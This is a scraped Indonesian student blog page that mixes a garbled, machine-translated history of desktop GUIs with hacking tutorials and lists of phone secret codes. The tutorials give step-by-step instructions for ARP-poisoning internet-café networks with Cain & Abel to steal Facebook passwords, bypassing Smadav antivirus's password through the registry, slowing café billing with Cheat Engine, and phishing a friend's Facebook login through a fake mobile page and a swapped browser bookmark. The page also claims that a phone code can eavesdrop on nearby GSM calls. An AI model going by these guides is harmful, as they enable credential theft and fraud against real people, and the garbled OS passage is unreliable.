Versi 4 dari K Desktop Environment menghasilkan banyak peningkatan baru pada GUI seperti animasi, rapih, pengelolaan jendela yang efisien dan adanya dukungan untuk desktop widget (sama seperti vista). Ukuran ikon mudah diatur dan hampir setiap desain elemen akan jauh lebih mudah untuk dikonfigurasi. Beberapa perubahan yang paling mencolok meliputi ikon baru, tema dan suara, yang disediakan oleh proyek Oxygen. Semua ikon ini akan lebih fotorealistik. Ini jelas merupakan suatu kemajuan besar dari KDE versi sebelumnya. Kini dapat juga dijalankan di platform Windows dan Mac OS X.
Mac OSx SnowLeopard (10.6 pada 2008)
Mac OS X Snow Leopard (versi 10.6) ketujuh utama keluaran dari mac OS x, apple’ desktop dan server sistem operasi. apel ceo steve pekerjaan mengumumkan snow leopard di WWDC pada juni 8, 2008, dan ini secara pribadi mendemonstrasikan ke pengembang dengan wakil presiden senior teknik perangkat lunak, bertrand serlet. pertama demonstrasi umum diberikan wwdc 2009 dengan serlet dan phil schiller, wakil presiden senior dari pemasaran seluruh dunia.
Feature baru pada GUI :
Stacks, bila dipandang sebagai bentuk kotak (tetapi bukan sebagai urutan yang keatas), bisa melihat subfolder tanpa peluncuran finder. rak buku-buku perpustakaan (sebagai bentuk kotak dan daftar) telah dimodifikasi termasuk scroll-bar untuk folder dengan banyak file.
The Default Gamma, bila mempandang sebagai bentuk kotak (tetapi bu sebagai urutan yang keata, bisa melihat subfolder tanpa peluncuran finder. rak buku-bu perpustakaan (sebagai bentuk kotak dan daftar te memodifikasi masuk scroll-bar untuk folder dengan banyak file.
Windows 7
Windows 7 (sebelumnya berkodekan Blackcomb atau Vienna) merupakan versi selanjutnya yang akan menggantikan Windows Vista.[2] Microsoft mengumumkan bahwa pengembangan Windows 7 akan berjalan dalam tiga tahun. Versi klien dari Windows 7 akan dirilis dalam versi dan walaupun versi servernya (yang akan menggantikan) akan dirilis hanya dalam versi 64-bit, yang akan dinamakan Windows Server 2008 R2.
Tampilan GUI-nya memang tidak jauh berbeda dengan Vista namun di klaim Microsoft mempunyai 127 feature baru dan 27 diantaranya tentang perbaikan GUI dari OS sebelumnya.

TKJ SMK NASIONAL DEPOK
TKJ SMK NASIONAL DEPOK.BLOGSPOT.COM
TKJSMKNASIONALDEPOK.BLOGSPOT.COM

Hack Facebook Lewat Lan Or Warnet

Sniffing adalah sebuah aksi penyadapan. Melihat cara yang digunakan, sniffing dibagi kedalan dua kategori; passive sniffing yaitu melakukan penyadapan tanpa merubah data atau packet apapun dari jaringan sedangkan active sniffing merubah packet di jaringan atau mengirimkan packet dengan alamat MAC yang berubah-ubah secara acak dalam jumlah yang sangat banyak. Active sniffing biasanya menggunakan tool tambahan (yang biasa digunakan yaitu Etherflood), tapi kali ini kita hanya akan membahas bagaimana cara menggunakan passive sniffing dan tool yang kita gunakan adalah Cain & Abel.



Cain & Abel merupakan sebuah tool yang sangat popular dan cara penggunaannyapun sangat sederhana,

Langkah-langkah yang harus dilakukan:

Install program Cain&Abel
Jalankan Cain
Untuk melakukan aksi sniffing, klik tab Sniffer
Click tab APR
Click menu Configure – akan muncul configure dialog yang berisi tentang beberapa tab
configurationklik tab Sniffer – akan tampak beberapa keterangan tentang Adapter, IP Address dll – klik satu baris di bawah menu-menu tadi yang berisi keterangan IP Address komputer kita, MAC dll – kemudian OK.
Active kan Cain dengan mengklik tombol Start
Agar komputer kita memiliki kemampuan routing,
klik tombol Start APR Jalankan Command Prompt
Lakukan komunikasi dengan komputer target dengan melakukan pinging terhadap IP Address komputer target, contoh c:\ping 192.168.0.2, dalam beberapa kasus kita harus melakukan pinging (menurut pengalaman saya, pinging merupakan cara tercepat untuk melakukan komunikasi dengan komputer target) lebih dari satu komputer, hal itu bertujuan untuk menjadikan komputer lain sebagai gateway.
Pada Cain ada dua bagian tabel yang bermenu sama Status, IP Address, MAC Address dll. Untuk memulai, klik tabel bagian atas, kemudian klik tanda plus (Add to list)

Akan muncul dialog New ARP Poison Routing. Klik IP Address komputer target yang ada di kolom sebelah kiri dan klik IP Address komputer gateway pada kolom sebelah kanan. Klik OK


Setelah IP Address masuk ke dalam list, kita tinggal menpopular unggu lalu lintas packet yang tertangkap oleh Cain. Untuk mengetahui hasil yang tertangkap, klik tab passwords.


Silahkan dwownload ajah disini





Aplikasi ini bisa digunakan untuk mencuri password facebook. Cukup gunain ajah diwarnet-warnet entar dapat dech password nya.

CARA BOBOL PASSWORD SMADΔV ANTIVIRUS

Beberapa kelemahan smadav dari yg pertama sampai yg sekarang,

sedikit share nich tentang salah 1 dari banyak kelemahan smadav,salah-1nya pada keamanan system editor'a seperti desable-enable taskmanager, regedit, cmd, dllitu bsa dengan mudah di enable semua,,caranya mudah aja,langsung aja buka smadav kesayangan anda atau bagi yg sebal terhadav sma...dav

-pilih tab scanner=> -cari registry area dan non check list setelah itu check list kembali sampai deep (over 1500 registry values) ter check list-jika semua registry sudah tercheck list langsung aja scan tunggu beberapa saat jika udah fix all aja kalo gak repair all aja,,,-abis itu di restart dech n kalo ada deepfreze'a mendingan di logoff aje jika sudah liat hasil'a semua system editor dah kembali enable dah

and sedikit lagi kelemahan yg paling fatal yaitu bypass pasword smadav'atapi jika reg edit'a dah enable g2 dah,,,caranya mudah2 aja tuh...


"Tempat penyimpanan password antivirus smadav hal ini berlaku jika agan punya versi pro berada di HKCU\Software\SMADΔV dengan string value DrowsSap dengan data huruf “yg aneh”

agan semua cukup merename DrowsSap menjadi DrowsSapi dan jangan lupa ganti pula Reg Dword yang bernilai 1 menjadi 0 agar lebih mudah gan.."

tambahan, kalo yg di atsa buat bypass atau remove passwordkalo mau non aktivn pass'a tinggal ganti dword value data'a UsePassword jadi "0" maka non aktiflah password smadav'a

he he eee...haking lagi nich,,,jangan buat yg ngerusak yach nich cuma share suatu kelemahan system yg harus di perbaiki oleh admin smadavbiar gmanapun smadav produck buatan indonesiasaya cinta buatan indonesia

ini di peruntukan bagi yg belum taubuat yg udah tau gak pake ketawainsilakan di simak ajasaling menghargailah karya tulis orang....!!!

Memperlambat Cyber Billing Warnet

nie,ane kaseh tau cara hack billing warnet......
bagi yg blon tau adja,klo yg udah tau diem.....
hehehehe....
nie ane cuma copast doank :
Saya akan memberitahu cara memperlambat “CyberBilling”.
Alat yang kita butuhkan adalah:

1.Komputer dan perangkat lainya

2.Cheat Engine ne linknya Disini

Setelah Kita memiliki itu semua, saya akan memberikan langkah-langkah untuk memperlambat waktu pada “CyberBilling”.
Ikuti langkah-langkah saya berikut ini:

1. Kita harus menginstall Cheat Engine
2. Kita buka Process List pada pojok kiri atas.

3. Dalam Process List kita cari nama program “CyberClient.exe”.

4. Klik OK

5. Kita centang pada “Enable Speedhack”

6. Kita buat sleep timenya 1 (Untuk memperlambat pergerakanwaktu billing)

7. Terakhir Klik dah tu “Set Speed”

Selesai kalian lihat pasti waktu billing kalian akan menjadi lambat. Semakin berat program yang Anda jalankan semakin lambat waktu billing berjalan

CARA MENDAPATKAN PASSWORD FACEBOOK TEMAN ANDA LEWAT HP (Fakelogin Via Handphone)

KELOGIN ATAU PHISING.........HACK FACEBOOK VIA HANDPHONE DENGAN FAKELOGIN ATAU PHISING.........HACK FACEBOOK VIA HANDPHONE DENGAN FAKELOGIN ATAU PHISING.........HACK FACEBOOK VIA HANDPHONE DENGAN FAKELOGIN ATAU PHISING.........HACK FACEBOOK VIA HANDPHONE DENGAN FAKELOGIN ATAU PHISING.........HACK FACEBOOK VIA HANDPHONE DENGAN FAKELOGIN ATAU PHISING.........HACK FACEBOOK VIA HANDPHONE DENGAN FAKELOGIN ATAU PHISING.........


kali ini saya ingin posting tentang bagai mana cara fakelogin via handphone,
setelah maraknya fakelogin via web yg udah basi yg udah di patch oleh admin, tapi dengan fake login or phising lewat handphone ini
anda masih bisa melakukan fakelogin via hp, dijamin lancar, tapi masalahnya ini hanya untuk teman di sekitar
bisa saja anda menyebarkn ke orang jauh tapi dengan sms aja
dikarenakan pengiriman via facebook sendiri sudah di blokir untuk pengiriman dengan konten2 tersebut
jadi ini adalah hack ampuh ala hackershane bagi pemula yg masih newbie
untuk yg sudah tau maaf yach jika posting ini mengangu,
ini di postingkan bagi yg belum tau dan untuk menepis fake login
agar di mana2 tidak terkena hack dengan cara ini.
kami harap anda tidak menyalah gunakan posting kali ini
gunakanlah technik hacking ini dengan bijak
saya tidak bertanggung jawab atas hal ini tangung jawab pada anda masing2
bila anda ketauan yah itu resiko anda okeh
kalo gak mau kena resiko jangan ikuti cara ini, ini hanyalah pembelajaran semata...




okeh langsung aja
berikud saya jelaskan n gak perlu panjang lebar lagi
jika anda tau cara penyebarannya technik ini berjalan dengan lancar bisa 80% berhasil bahkan 100%
carakerjanya pertama2 yaitu :



  • anda download disini  untuk mendapatkan file php untuk phising /fakelogin dan disini  untuk passrarnya.
  • setelah anda mendownload file diatas yg berisi index.htm dan write.php lalu anda upload ke webhosting kesayangan anda yg suport dengan file php contohnya ripway or apalah kalo gak tau tanya teman or mbah google, kalo gak mau nanya di luar tanya ja di pos komentar. usahakan nama webhosting anda tidah mencurugakan, seperti login, signup, m.facebook.com, or apalah suka2 anda.
  • okeh setelah anda download kedua file di atas maka siap lah fakelogin or phising anda.
  • jika sudah, langsung ja buka file index.htm maka ada tampilan seperti m.facebook.com
  • lalu coba anda login ngasal2 aja di kotak email dan pass, pastikan itu fakelogin anda.
  • jika sudah buka webhosting tempat index anda berada lalu refresh di root or reload halaman webhosting anda maka akan ada file baru berupa passes.txt itu adalah tempat wadah password target, coba anda buka apa yg terjadi maka akan muncul kata2 yg anda tulis dalam teks box pada email n pass. kalo blom ada seperti itu berarti anda blom berhasil atau webhosting anda tidak suport file php.
  • ini blom selesai, tinggal tahap penyebarannya aja, yaitu bisa d taro di hp anda atau d hp teman anda. tapi penyebarannya dengan cara anda masing2 aja.
  • nah jika tahap di atas sudah anda lakukan dan anda sudah punya link fakelogin anda sendiri maka lakukan penyebaran seperti yg saya contohkan ini:


saya akan mencontohkan penyebaran lewat teman
  • pertama anda pinjam hp teman anda dengan berdialog seperti ini :
ente   : pren minjem hp dunk buat browsing google or buka fb, 
            cz hp w lagi kagak ada plza nich..plisss
target : iye tapi jangan lama2 yach tar pulsa gw abis,
ente    : okeh deh pren tenang aje tar kalo abis gw isiin
target  : nich hp gw, hp sendiri ja gak bisa di isiin belaga ngisiin plza gw lo, 
            dah gak sah pake aja..gratisss....
ente     : he..3x..bisa ja lo...okeh thank banget sob....!!#*!$^@*!*%$&*^%#!!
tapi terserah ente mau ngemeng dengan cara apa dech, he he heee....
nah jika hp teman anda sudah di tangan itu adalah kesempatan anda dalam melakukan kejahatan, langsung aja anda buka opera mini kesayangan anda di hp teman or target, Buka bookmarks lalu cari tulisan Facebook, klik manage, edit,  lalu adresnya yg m.facebook.com di gantikan dengan nama link index.htm yg sudah anda punya
  contoh:
          http://m.facebook.com di ganti dengan http://h1.ripway.com/facebook.mobile9174/index.htm


jika sudah save dech n jangan lupa contrengin display on start page biar doi nampil di depan halaman opera, trus abis itu balikin dah hp temen lo, belaga dah puas ol


  • berikudnya anda tinggal nunggu si empunya hp or temen2nya ol di hp target, 80% pasti dia buka bookmark tadi.
  • jika penasaran mau liat password n email hasil halaman facebook palsu yg sudah di taro di hp target, tinggal buka link'a passes.txt tadi dah, dari hp ente bisa d buka kok.


   contohnya :  http://h1.ripway.com/facebook.mobile9174/passes.txt




jika anda belom paham silakan add fb w di
http://www.facebook.com/HACKER.SHANE.H4CK3R.5H4N3.WORMVIRUS
tanyakan kesulitan anda




maafkan jika ada kesalahan dalam penulisan atau kesalah penafsiran or posting ini menurutanda menggangu dan saya mengucapkan terimakasih banyak karena sudah mengunjungi blog ini.
jika adanya posting ini menggangu kami dari pikah admin akan siap menghapus posting ini


sekalilagi saya ingetkan jangan di salah gunakan technik ini, ini hanya pembelajaran untuk anda yg belum tau adanya teror ini n bisa anda cegah sebelum anda terlambat.
saya sarankan agar berhati2 saat login di hp teman anda, check page information halaman login facebook anda di hp atau gunakan username palsu dulu untuk mencegak fakelogin,
jika ada peringatan kesalahan itu berarti halamn asli, tapi jika itu halamn palsu maka akan langsung masuk kehalaman asli setelah anda klik tombol login pada halaman palsu...
trimakasih..





waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!.....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!



TERIMAKASIH KARENA ANDA SUDAH MENGUNJUNGI BLOG INI, SEMOGA ILMU YANG ADA DI SINI BERMANFAAT UNTUK KALIAN SEMUA, SILAKAN MENCOBA TAPI JANGAN DI SALAH GUNAKAN YACH.....GUNAKANLAH DENGAN BIJACK....INGAT INI ADALAH TANGUNGJAWAB MASING2, KAMI TIDAK BERTANGGUNG JAWAB...!!!! SELAMAT MENCOBA...???





waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!.....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!....waspadalah waspadalah...!!!!

Kumpulan Code Phone Hampir Semua Jenis HP


Kode Rahasia Umum Symbian

*#06# Melihat IMEI
*#0000# Melihat Versi sofware
*#9999# Melihat Versi sofware
*#7370# Soft Reset
Untuk Hard reset: Tekan Tombol hijau, 3 dan * ditekan bersamaan, tekan tombol power. Password standar 12345
*#92702689# Melihat info tanggal perbaikan

Kode Rahasia Umum Java

*#7380# Reset atau Restore Factory Setting Nokia seri 40
*#7370# Reset atau Restore Factory Setting Nokia seri 60
*3370# Untuk restart ponsel Nokia 3310
*#7220# Mengaktifkan GPRS PCCCH
*#3925538# Menghapus Wallet di ponsel Nokia 6610,63101, data Wallet terhapus semua
*#67705646# Menghapus operator logo di ponsel Nokia 3310 & 3330
Operator GSM

Selain kode rahasia yang ada di ponsel, operator GSM juga memiliki kode rahasia untuk layanan yang diberikan pada pelanggan.
Call Diverting/ Call Forward/ Pengalihan Semua

* * 21* NUMBER # [SEND] Mengaktifkan
# # 21 # [SEND] Membatalkan
* # 21 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila tak ada jawaban
* * 61 * NUMBER # [SEND] Mengaktifkan
# # 61 # [SEND] Membatalkan
* # 61 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila dilu-ar jangkauan
* * 62 * NUMBER # [SEND] Mengaktifkan
# # 62 # [SEND] Membatalkan
* # 62 # [SEND] Melihat status
Call Diverting/ Call Forward/ Pengalihan bila sibuk
* * 67 * NUMBER # [SEND] Mengaktifkan
# # 67 # [SEND] Membatalkan
* # 67 # [SEND] Melihat status
# # 002 # [SEND] Membatalkan semua pengali-han
Diverting Data/ Forward Data/ Pengalihan semua data
* * 21 * NUMBER * 25 # [SEND] Mengaktifkan
# # 21 # * 25 [SEND] Membatalkan
* # 21 # * 25 # [SEND] Melihat status

NOKIA

Nokia 9300/ 9500

*#170602112302# Melihat versi software
*3370# Memakai tenaga baterai cadangan
#3370# Menon-aktifkan Enhanced Full Rate Codec ( EFR).
*#4720# Mengaktifkan Half Rate Codec.
#pw+1234567890+l# Melihat status Provider Lock, (tekan * untuk simbol p,w +)
#pw+l 234567890+2# Melihat status Network Lock, (tekan * untuk simbol p,w +)
#pw+1234567890+3# Melihat status Country Lock, (tekan * untuk simbol p,w +)
#pw+1234567890+4# Melihat status SIM ‘Card Lock, (tekan * untuk simbol p,w +)
*#21# Melihat semua panggilan yang dialihkan.
*#2640# Menampilkan Security Code.
#30# Melihat Private Number.
*#73# Reset the Phone Timers.
*#746025625# Menampilkan status SIM Clock.
*#7760# Manufactures code.
*#7780# Restore factory settings
*#92702689* Melihat garansi posnel
(*#WAROANTY#)
Tekan & tahan tombol “Shift + Ctrl + F dan tombol Power Soft Reset


Nokia E60

*#92702689# *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis.
*4720# (*hraO#) Mengaktifkan Half Rate
#4720# (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370* (#efrO#) Menon-aktifkan Enhanced Full Rate
* #746085685* (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#peaO#) Mengaktifkan GPRS dan dukungan Packet Common Control Channel (PCCCH)
*#7230# (*#pcdO#) Menon-aktifkan GPRS dan dukungan Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538# (*#resOwallet#) Reset the Mobile Wallet, data akan hilang semua

Nokia E61

Tahan # Berganti profile dan mode diam.
Tombol fungsi biru + Ctrl Mengaktifkan Bluetooth
Tombol fungsi biru + Chr Mengaktifkan IR
Ctrl + C Copy
Ctrl + X Cut
Ctrl + V Paste
Ctrl + Joystick Down Page Down (turun satu halaman)
Ctrl + Joystick Up Page Up (naik satu halaman)
Shift + Joystick Left or Right Menyorot satu lurus
Shift + Ctrl + Joystick Left or Right Menyorot satu kata
Ctrl + Joystick Left or Right Menggerakkan cursor diantara kata
*#2820# Melihat alamat Bluetooth
*#62209526# Melihat alamat adapter WLAN MAC
*#92702689# Melihat usia ponsel


Nokia E65

*#92702689# *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720# (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370# (#efrO#) Menon-aktifkan Enhanced Full Rate
*#746085685# (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#pcaO#) Mengaktifkan Half Rate
*#7230# (*#pcdO#) Menon-aktifkan Half Rate
*#7760# (*#ssnO#) Mengaktifkan Enhanced Full Rate
*#2820# (*#btaO#) Menon-aktifkan Enhanced Full Rate
*#7370925538# (*#resOwallet#) Melihat status SIM lock


Nokia E70

*#btaO# Melihat alamat Bluetooth
*#macOwlan# Melihat alamat adapter WLAN MAC
*#oprOlogo# Menghilangkan logo operator
*#pcaO# Mengaktifkan logo operator
*#pcdO# Menon-aktifkan GPRS dan dukungan Packet common control channel (PCCCH)
*#simOclock# Melihat status SIM clock
*#170602112302# Melihat versi software
*#warOanty# Melihat kode garansi
#pw+1234567890+n#
n = 1
n = 2
n = 3
n = 4 Menampilkan status SIM lock
provider lock
network lock
country lock
SIM lock


Nokia N80

*#92702689* *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720* (#hraO#) Menon-aktifkan Half Rate
*3370# (*efrO#) Mengaktifkan Enhanced Full Rate
#3370* (#efrO#) Menon-aktifkan Enhanced Full Rate
*#746085685* (*#simOclock#) Melihat sta¬tus SIM lock
*#7220# (*#pcaO#) Mengaktifkan dukungan GPRS dan Packet Common Control Channel (PCCCH)
*#7230#. (*#pcdO#) Menon-aktifkan dukun¬gan GPRS and Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538*. (*#resOwallet#) Reset the Mobile Wallet


Nokia N91

*#06# Melihat IMEI.Tanggal pembelian, tanggal servis
*#0000# Menampilkan versi firmware dan tanggal
*#btaO# Melihat alamat Bluetooth MAC
*#oprOlogo# Menghilangkan logo operator
*#pcaO# Mengaktifkan dukungan GPRS PCCCH
*#pcdO# Menon-aktifkan dukungan GPRS PCCCH
*#resOwallet# Reset the mobile wallet
*#simOclock# Menampilkan status SIM clock
*#ssnO# Menampilkan nomor seri pabrikasi
*#warOanty# Menampilkan garansi dan servis
*efrO# Mengaktifkan encoding EFR
#efrO# Menon-aktifkan encoding EFR
*hraO# Mengaktifkan encoding HR
#hraO# Menon-aktifkan encoding HR
#pw+1234567890+n#
n = 1
n = 2
n = 3
n = 4 Menampilkan status SIM lock
provider lock
network lock
country lock
SIM lock


Nokia N93

*#92702689* *#warOanty# Melihat IMEI. Tanggal pembelian, tanggal servis
*4720# (*hraO#) Mengaktifkan Half Rate
#4720#* (#hraO#) Menon-aktifkan Half Rate
*#3370# (*efrO#) Mengaktifkan Enhanced Full Rate
*#746085685* (*#simOclock#) Melihat status SIM lock
*#7220# (*#pcaO#) Mengaktifkan dukungan GPRS dan Packet Common Control Channel (PCCCH)
*#7230# (*#pcdO#) Menon-aktifkan dukung¬an GPRS and Packet common control channel (PCCCH)
*#7760# (*#ssnO#) Melihat nomor seri pabrikasi
*#2820# (*#btaO#) Melihat alamat Bluetooth MAC
*#7370925538# (*#resOwallet#) Reset Mobile Wallet


Nokia N96

*#92702689# Melihat umur ponsel
*#62209526# Alamat Wireless MAC (M A C _ WLAN)
*#2820# Alamat Bluetooth MAC (B T A 0?)
*#7370# Format Soft Reset
*#7780# Factory Reset/ Hard Reset


SAMSUNG

Untuk membuka kode ponsel Samsung, dapat dilakukan dengan cara posisi SIM Card tidak terpasang pada ponsel. Namun kode dibawah ini tidak akan berfungsi pada beberapa versi ponsel Samsung secara keseluruhan.
*#06# Melihat IMEI
*2767*5282# Java reset
*2767*63342# Reset media
*2767*927# Wap reset
*#9998*4357# Help menu
**9998*5282# Setting Java server
*#9999#0# Melihat monitor mode
*#9999# Sofware version
*#8888# Hardware version
*#9998*748# SIM info
*#9998*523* Contrast layar ponsel
*#9998*842* Vibration ON lalu tekan OK
*#9998*289# atau *0289# atau *#0289# Buzzer ON lalu tekan OK
*#9998*782* Menunjukkan tanggal & alarm
*#8999*638# Menunjukkan info network
*#9998*5646* Mengubah logo operator
*#9998*968* Menunjukkan nada untuk alarm
*#3243948# Digital audio interference OFF
*#32436837# Digital audio interperence
*#0001# Menunjukkan serial parameter
*#9998*228# Melihat kapasitas batera
*2767*2878# Custom EEEPROM reset
*2767*3855# Full EEPROM reset
*#9998*585# Non-Volatile Memory (NVM)
*#9998*76# Nomor produksi
*#9998*782# Menunjukkan tanggal dan jam alarm
*#9998*778# or *#9998*0778# or
*#0778# Daftar layanan SIM
*#9998*377# or *#9998*0377# Error log
*#9998*746# or *#9998*0746# or
*#0746# Sim Info


Samsung V200 - V300

*2767*63342# Unlock Code
*2767*3855# Unlock Code
*2767*2878# Unlock Code
*2767*927# Unlock Code
*2767*7822573738# Unlock Code


LG

2945#*# Test mode LG
2945*#01*# Menu rahasia
*#06# IMEI
*#07# IMEI and SW
*8375# Software version (LG B1200):
*6861# Recount cheksum (LG B1200)
*PWR 668 Factory test (B1200):
1945#*5101# Simlock menu (LG B1200)
2945#*5101# Simlock menu (LG 510W, 5200)
2945#*70001# Simlock menu (LG 7020, 7010)
2947#* Simlock menu (LG 500, 600)


BENQ SIEMENS

*#06# Versi software BenQ Siemens, lebih lengkapnya, tekan softkey beberapa kali
*#0001# Menu bahasa Inggris
*#0606# Kode rahasia, lepaskan SIM card lebih dulu
*#0003*(secret code)* Unlock Sim
*#0049# Menu bahasa Jerman
*12022243121 Layar tambahan


BENQ

C30 *#06# Cek IMEI
*#166*# Cek Versi Software C36 *#06# Cek IMEI
*#166*# Cek Versi Software T60 *#06# Cek IMEI
*#66*# Cek Versi Software E72 *#06# Cek IMEI
Mengganti bahasa ke default atau English *#0000# —> dial.
Mengganti bahasa dari English ke Indonesia: *#0062# —> dial.
* melihat kode negara


MOTOROLA

Pada ponsel Motorola terdapat symbol yang cukup aneh untuk fungsi Pause. Symbol [] (Pause) maksudnya tekan tombol * dan tahan hingga muncul tanda []. Masih banyak kode-kode lain yang ada. Jika angka terakhir dengan angka 0 maka kita dapat menon-aktifkan kode tersebut. Nomor tiga digit di bagian tengah dimulai dari angka 0 hingga 999. Kita bisa mengganti frekuensi menjadi 900/1800 den¬gan memasukkan tipe tertentu. Berikut ini langkah-langkahnya.
*#06# Melihat IMEI
Tekan bersamaan * 7 Kode untuk membuka tombol
[] [] [] 0 0 8 [] 1 [] Memilih line telepon – (gunakan untuk menulis sesuatu di bawah nama provider
[] [] [] 1 0 5 [] 1 [] Menambahkan phonebook di menu utama
[] [] [] 1 0 7 [] 1 [] Menambahkan pesan di menu utama
[] [] [] 1 0 8 [] 1 [] Copy memory SIM (menu phonebook)
[] [] [] 1 1 3 [] 1 [] Pilihan teknis (menu utama)
[] [] [] 1 0 1 [] 1 [] Slow (Frequency menu pen-cari)
[] [] [] 1 0 2 [] 1 [] Medium (Frequency menu pencari)
[] [] [] 1 0 3 [] 1 [] Fast (Frequency menu pen¬cari)
[] [] [] 1 1 9 [] 1 [] Mengaktifkan EFR
[] [] [] 0 0 4 [] 1 [] Mengganti Pin
[] [] [] 0 0 5 [] 1 [] Membuka blok menggu-nakan nomor PUK


CODE PHONE CELL CHINA

Seperti halnya ponsel branding, ponsel China juga memiliki kode rahasia untuk mengakses menu-menu rahasia. Ponsel China ini memiliki fitur seperti layar sentuh, dual kamera, dual sirh, dual baterai, dual charger dan fitur-fitur lainnya. Sebagian besar ponsel China memiliki software dan fitur yang sama, namun tampilannya saja yang terlihat berbeda.
1122, 3344, 1234, 5678 Kode default user
*#110*01# Mode teknis
*#987# Mode pabrik Factory mode
*#110*01# -> Device -> Set UART -> PS Config -> UART1/115200 Mengaktifkan port COM
*#987*99# Restore factory settings
*#369# Mengatur LCD contrast
*#800# software version
*#900# software version
*#0000# Send Mengatur bahasa standard
*#0044# Send Mengatur bahasa Inggris
*#001# Send Mengatur bahasa Inggris (firmware baru)
*#0086#, *#0886# Mengganti ke bahasa China
*#0084#, *#0966# Mengganti ke bahasa Vietnam


Sony Erricsson K800i
*#3449*~11*1# –> Menyantol frekuensi GSM Terdekat, Sehingga Kita bisa Mengguping Pembicaraan GSM aktif terdekat dengan lokasi anda…

Kode akses Nokia :
*#30# : Menampilkan 'private number' yang menghubungi anda.
*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel).
*#7780# : Mengembalikan ke setting pabrik (factory setting).
*#2820# : Alamat IP perangkat Bluetoo...th (untuk ponsel yang mempunyai Bluetooth).
xx# : Akses cepat ke nama/nomer telepon di phone book ponsel, misalnya 20#.Tombol off : Menekan dengan singkat, untuk berpindah antar profile.
*3370# : Mengaktifkan EFR(Enhanced Full Rate) Codec (tidak berlaku di ponsel Symbian).
#3370# : Menonaktifkan EFR Codec.
*#4270# : Mengaktifkan Half Rate Codec.
*#4270# : Menonaktifkan Half Rate Codec.
*#0000# : Menampilkan versi software ponsel.
*#9999# : Kode alternatif jika *#0000# tidak bekerja.
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#21# : Mengecek nomor pengalihan "All Call" yang digunakan.
*#2640# : Menampilkan kode keamanan ponsel yang digunakan.
*#43# : Mengecek status "Call Waiting".
*#61# : Untuk mengecek nomor pemanggil yang dialihkan ketika tak anda jawab.
*#62# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda di luar jangkauan.
*#67# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda sedang sibuk.
**21*number# : Menghidupkan pengalihan "All Call" pada nomor yang diisi.
**61*number# : Menghidupkan pengalihan "No Reply" pada nomor yang diisi.
**67*number# : Menghidupkan pengalihan "On Bussy" pada nomor yang diisi.
*#67705646# : Mengganti logo operator logo pada Nokia 3310 dan 3330.
*#746025625# : Menampilkan status SIM Clock.
*#7760# : Menampilkan kode pabrikan (sebagian besar ponsel tipe lama).
*#92702689# : Memunculkan :
1. Serial Number,
2. Date Made,
3. Purchase Date,
4. Date of last repair,
5.Transfer user data. Keluar dari mode ini harus merestart ponsel ( pada beberapa ponsel ).
Kode akses Sony Ericsson :
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#0000# : Mereset bahasa kembali ke English.
> * < < * < * : Service Menu - menampilkan versi software ponsel. Tekan "Yes" berulang-ulang untuk melihat semua data software dan tekan ">" untuk melihat semua teks yang terdapat pada ponsel.
< * * < : Mengunci SIM Card. Sortcuts : 1. Menyimpan nomor "Missed Call" di direktori ponsel. Cari menu "Missed Call", tekan "Yes" untuk menampilkan nomor yang dituju. Tekan nomor apa saja ( 0 sampai 9 ), kemudian tekan "clear" sekali untuk memblok nomor tersebut, kemudian tekan dan tahan "<" sampai muncul "Store", tekan "Yes". 2. Menyembunyikan nomor. Setelah menekan nomor yang dituju dan sebelum menekan "Yes", tekan ' > ' 2 kali untuk memilih "Hide Id?" dan tekan 'Yes'.
3.Mengecek level batere ketika ponsel mati (off ).Tekan 'No' secara cepat 1 x dan tunggu hingga tampilan baterai terlihat.
4. Menyimpan nomor di memori ponsel (bukan SIM Card).Ikuti prosedur normal untuk menyimpan nomor. Ketika tampilan untuk menyimpan terlihat tekan '#' sekali dan lokasi yang diinginkan, atau tekan '#' 2 kali untuk melihat posisi lanjutan.
5. Menghubungi nomor dari pesan SMS.Mengarahkan kursor pada nomor yang tertulis, kemudian tekan "Yes".Shortcut Penampilan Gambar :(Berlaku di sebagian besar ponsel Symbian).Ketika melihat image atau gambar di galeri, tekan :1 : untuk memutar gambar ke kiri.2 : untuk memutar gambar ke kanan.5 atau 7 : untuk memperbesar (zoom) gambar.* : untuk tampilan fullscreen atau non fullscreen.Catatan : perintah angka di atas bisa berbeda di setiap ponsel.Hard Reset :Peringatan !!! Semua data ponsel akan hilang.Dalam keadaan ponsel mati (off), tekan secara bersamaan tombol telepon (bicara), angka 3, dan tombol * (bintang). Kemudian dalam keadaan menekan ketiga tombol tersebut, tekan tombol On. Trik ini berlaku di sebagian besar ponsel Nokia.


tambahin buat Kode Rahasia CDMA
¦ Samsung

Samsung sph-n240, n400, a460, a500, etc Nam Programming:
Nam Set: ##Spc
